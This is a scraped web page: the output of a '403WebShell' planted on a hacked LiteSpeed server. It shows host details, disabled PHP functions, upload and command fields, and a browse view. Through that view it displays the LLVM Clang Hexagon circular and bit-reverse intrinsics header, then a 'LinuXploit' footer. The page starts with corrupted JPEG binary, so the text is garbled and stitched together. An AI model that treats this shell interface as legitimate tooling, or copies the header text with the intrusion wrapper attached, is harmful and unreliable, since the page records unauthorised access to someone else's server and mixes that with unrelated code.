JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 153.92.12.128  /  Your IP : 216.73.216.52
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /lib/clang/20/include/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /lib/clang/20/include//hexagon_circ_brev_intrinsics.h
//===----------------------------------------------------------------------===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//

#ifndef _HEXAGON_CIRC_BREV_INTRINSICS_H_
#define _HEXAGON_CIRC_BREV_INTRINSICS_H_ 1

#include <hexagon_protos.h>
#include <stdint.h>

/* Circular Load */
/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_circ_load_update_D(Word64 dst, Word64 *ptr, UWord32 incr, UWord32 bufsize, UWord32 K)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_circ_load_update_D(dest,ptr,incr,bufsize,K)  \
    { ptr = (int64_t *) HEXAGON_circ_ldd (ptr, &(dest), ((((K)+1)<<24)|((bufsize)<<3)), ((incr)*8)); }

/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_circ_load_update_W(Word32 dst, Word32 *ptr, UWord32 incr, UWord32 bufsize, UWord32 K)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_circ_load_update_W(dest,ptr,incr,bufsize,K)  \
    { ptr = (int *) HEXAGON_circ_ldw (ptr, &(dest), (((K)<<24)|((bufsize)<<2)), ((incr)*4)); }

/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_circ_load_update_H(Word16 dst, Word16 *ptr, UWord32 incr, UWord32 bufsize, UWord32 K)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_circ_load_update_H(dest,ptr,incr,bufsize,K)  \
    { ptr = (int16_t *) HEXAGON_circ_ldh (ptr, &(dest), ((((K)-1)<<24)|((bufsize)<<1)), ((incr)*2)); }

/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_circ_load_update_UH( UWord16 dst,  UWord16 *ptr, UWord32 incr, UWord32 bufsize, UWord32 K)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_circ_load_update_UH(dest,ptr,incr,bufsize,K) \
    { ptr = (uint16_t *) HEXAGON_circ_lduh (ptr, &(dest), ((((K)-1)<<24)|((bufsize)<<1)), ((incr)*2)); }

/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_circ_load_update_B(Word8 dst, Word8 *ptr, UWord32 incr, UWord32 bufsize, UWord32 K)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_circ_load_update_B(dest,ptr,incr,bufsize,K)  \
    { ptr = (int8_t *) HEXAGON_circ_ldb (ptr, &(dest), ((((K)-2)<<24)|(bufsize)), incr); }

/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void  Q6_circ_load_update_UB(UWord8 dst, UWord8 *ptr, UWord32 incr, UWord32 bufsize, UWord32 K)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_circ_load_update_UB(dest,ptr,incr,bufsize,K) \
    { ptr = (uint8_t *) HEXAGON_circ_ldub (ptr, &(dest), ((((K)-2)<<24)|(bufsize)), incr); }

/* Circular Store */
/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_circ_store_update_D(Word64 *src, Word64 *ptr, UWord32 incr, UWord32 bufsize, UWord32 K)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_circ_store_update_D(src,ptr,incr,bufsize,K)  \
    { ptr = (int64_t *) HEXAGON_circ_std (ptr, src, ((((K)+1)<<24)|((bufsize)<<3)), ((incr)*8)); }

/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_circ_store_update_W(Word32 *src, Word32 *ptr, UWord32 incr, UWord32 bufsize, UWord32 K)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_circ_store_update_W(src,ptr,incr,bufsize,K)  \
    { ptr = (int *) HEXAGON_circ_stw (ptr, src, (((K)<<24)|((bufsize)<<2)), ((incr)*4)); }

/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_circ_store_update_HL(Word16 *src, Word16 *ptr, UWord32 incr, UWord32 bufsize, UWord32 K)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_circ_store_update_HL(src,ptr,incr,bufsize,K) \
    { ptr = (int16_t *) HEXAGON_circ_sth (ptr, src, ((((K)-1)<<24)|((bufsize)<<1)), ((incr)*2)); }

/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_circ_store_update_HH(Word16 *src, Word16 *ptr, UWord32 incr, UWord32 bufsize, UWord32 K)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_circ_store_update_HH(src,ptr,incr,bufsize,K) \
    { ptr = (int16_t *) HEXAGON_circ_sthhi (ptr, src, ((((K)-1)<<24)|((bufsize)<<1)), ((incr)*2)); }

/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_circ_store_update_B(Word8 *src, Word8 *ptr, UWord32 I4, UWord32 bufsize,  UWord64 K)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_circ_store_update_B(src,ptr,incr,bufsize,K)  \
    { ptr = (int8_t *) HEXAGON_circ_stb (ptr, src, ((((K)-2)<<24)|(bufsize)), incr); }


/* Bit Reverse Load */
/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_bitrev_load_update_D(Word64 dst, Word64 *ptr, UWord32 Iu4)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_bitrev_load_update_D(dest,ptr,log2bufsize) \
    { ptr = (int64_t *) HEXAGON_brev_ldd (ptr, &(dest), (1<<(16-((log2bufsize) + 3)))); }

/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_bitrev_load_update_W(Word32 dst, Word32 *ptr, UWord32 Iu4)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_bitrev_load_update_W(dest,ptr,log2bufsize) \
    { ptr = (int *) HEXAGON_brev_ldw (ptr, &(dest), (1<<(16-((log2bufsize) + 2)))); }

/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_bitrev_load_update_H(Word16 dst, Word16 *ptr, UWord32 Iu4)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_bitrev_load_update_H(dest,ptr,log2bufsize) \
    { ptr = (int16_t *) HEXAGON_brev_ldh (ptr, &(dest), (1<<(16-((log2bufsize) + 1)))); }

/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_bitrev_load_update_UH(UWord16 dst,  UWord16 *ptr, UWord32 Iu4)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_bitrev_load_update_UH(dest,ptr,log2bufsize) \
    { ptr = (uint16_t *) HEXAGON_brev_lduh (ptr, &(dest), (1<<(16-((log2bufsize) + 1)))); }

/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_bitrev_load_update_B(Word8 dst, Word8 *ptr, UWord32 Iu4)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_bitrev_load_update_B(dest,ptr,log2bufsize) \
    { ptr = (int8_t *) HEXAGON_brev_ldb (ptr, &(dest), (1<<(16-((log2bufsize))))); }

/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_bitrev_load_update_UB(UWord8 dst, UWord8 *ptr, UWord32 Iu4)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_bitrev_load_update_UB(dest,ptr,log2bufsize) \
    { ptr = (uint8_t *) HEXAGON_brev_ldub (ptr, &(dest), (1<<(16-((log2bufsize))))); }

/* Bit Reverse Store */

/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_bitrev_store_update_D(Word64 *src, Word64 *ptr, UWord32 Iu4)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_bitrev_store_update_D(src,ptr,log2bufsize)   \
    { ptr = (int64_t *) HEXAGON_brev_std (ptr, src, (1<<(16-((log2bufsize) + 3)))); }

/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_bitrev_store_update_W(Word32 *src, Word32 *ptr, UWord32 Iu4)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_bitrev_store_update_W(src,ptr,log2bufsize)   \
    { ptr = (int *) HEXAGON_brev_stw (ptr, src, (1<<(16-((log2bufsize) + 2)))); }

/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_bitrev_store_update_HL(Word16 *src, Word16 *ptr, Word32 Iu4)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_bitrev_store_update_HL(src,ptr,log2bufsize)   \
    { ptr = (int16_t *) HEXAGON_brev_sth (ptr, src, (1<<(16-((log2bufsize) + 1)))); }

/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_bitrev_store_update_HH(Word16 *src, Word16 *ptr, UWord32 Iu4)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_bitrev_store_update_HH(src,ptr,log2bufsize)   \
    { ptr = (int16_t *) HEXAGON_brev_sthhi (ptr, src, (1<<(16-((log2bufsize) + 1)))); }

/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: void Q6_bitrev_store_update_B(Word8 *src, Word8 *ptr, UWord32 Iu4)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#define Q6_bitrev_store_update_B(src,ptr,log2bufsize)   \
    { ptr = (int8_t *) HEXAGON_brev_stb (ptr, src, (1<<(16-((log2bufsize))))); }


#define HEXAGON_circ_ldd  __builtin_circ_ldd
#define HEXAGON_circ_ldw  __builtin_circ_ldw
#define HEXAGON_circ_ldh  __builtin_circ_ldh
#define HEXAGON_circ_lduh __builtin_circ_lduh
#define HEXAGON_circ_ldb  __builtin_circ_ldb
#define HEXAGON_circ_ldub __builtin_circ_ldub


#define HEXAGON_circ_std  __builtin_circ_std
#define HEXAGON_circ_stw  __builtin_circ_stw
#define HEXAGON_circ_sth  __builtin_circ_sth
#define HEXAGON_circ_sthhi __builtin_circ_sthhi
#define HEXAGON_circ_stb  __builtin_circ_stb


#define HEXAGON_brev_ldd  __builtin_brev_ldd
#define HEXAGON_brev_ldw  __builtin_brev_ldw
#define HEXAGON_brev_ldh  __builtin_brev_ldh
#define HEXAGON_brev_lduh __builtin_brev_lduh
#define HEXAGON_brev_ldb  __builtin_brev_ldb
#define HEXAGON_brev_ldub __builtin_brev_ldub

#define HEXAGON_brev_std  __builtin_brev_std
#define HEXAGON_brev_stw  __builtin_brev_stw
#define HEXAGON_brev_sth  __builtin_brev_sth
#define HEXAGON_brev_sthhi __builtin_brev_sthhi
#define HEXAGON_brev_stb  __builtin_brev_stb

#ifdef __HVX__
/* ==========================================================================
   Assembly Syntax:       if (Qt) vmem(Rt+#0) = Vs
   C Intrinsic Prototype: void Q6_vmaskedstoreq_QAV(HVX_VectorPred Qt, HVX_VectorAddress A, HVX_Vector Vs)
   Instruction Type:      COPROC_VMEM
   Execution Slots:       SLOT0
   ========================================================================== */

#define Q6_vmaskedstoreq_QAV __BUILTIN_VECTOR_WRAP(__builtin_HEXAGON_V6_vmaskedstoreq)

/* ==========================================================================
   Assembly Syntax:       if (!Qt) vmem(Rt+#0) = Vs
   C Intrinsic Prototype: void Q6_vmaskedstorenq_QAV(HVX_VectorPred Qt, HVX_VectorAddress A, HVX_Vector Vs)
   Instruction Type:      COPROC_VMEM
   Execution Slots:       SLOT0
   ========================================================================== */

#define Q6_vmaskedstorenq_QAV __BUILTIN_VECTOR_WRAP(__builtin_HEXAGON_V6_vmaskedstorenq)

/* ==========================================================================
   Assembly Syntax:       if (Qt) vmem(Rt+#0):nt = Vs
   C Intrinsic Prototype: void Q6_vmaskedstorentq_QAV(HVX_VectorPred Qt, HVX_VectorAddress A, HVX_Vector Vs)
   Instruction Type:      COPROC_VMEM
   Execution Slots:       SLOT0
   ========================================================================== */

#define Q6_vmaskedstorentq_QAV __BUILTIN_VECTOR_WRAP(__builtin_HEXAGON_V6_vmaskedstorentq)

/* ==========================================================================
   Assembly Syntax:       if (!Qt) vmem(Rt+#0):nt = Vs
   C Intrinsic Prototype: void Q6_vmaskedstorentnq_QAV(HVX_VectorPred Qt, HVX_VectorAddress A, HVX_Vector Vs)
   Instruction Type:      COPROC_VMEM
   Execution Slots:       SLOT0
   ========================================================================== */

#define Q6_vmaskedstorentnq_QAV __BUILTIN_VECTOR_WRAP(__builtin_HEXAGON_V6_vmaskedstorentnq)

#endif


#endif  /* #ifndef _HEXAGON_CIRC_BREV_INTRINSICS_H_ */

#ifdef __NOT_DEFINED__
/*** comment block template  ***/
/* ==========================================================================
   Assembly Syntax:       Return=instruction()
   C Intrinsic Prototype: ReturnType Intrinsic(ParamType Rs, ParamType Rt)
   Instruction Type:      InstructionType
   Execution Slots:       SLOT0123
   ========================================================================== */
#endif /***  __NOT_DEFINED__  ***/

Youez - 2016 - github.com/yon3zu
LinuXploit